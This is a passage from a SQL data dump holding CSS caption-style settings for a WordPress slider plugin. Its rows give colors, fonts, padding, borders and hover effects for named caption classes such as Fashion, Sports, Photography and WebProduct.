or\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}'),(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":[\"\"],\"hover\":\"\"}'),(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}'),(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"power3.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}'),(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"power3.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"back.out\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1